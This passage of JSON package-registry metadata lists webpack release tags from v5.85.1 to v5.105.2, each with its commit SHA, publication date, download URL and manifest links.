-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job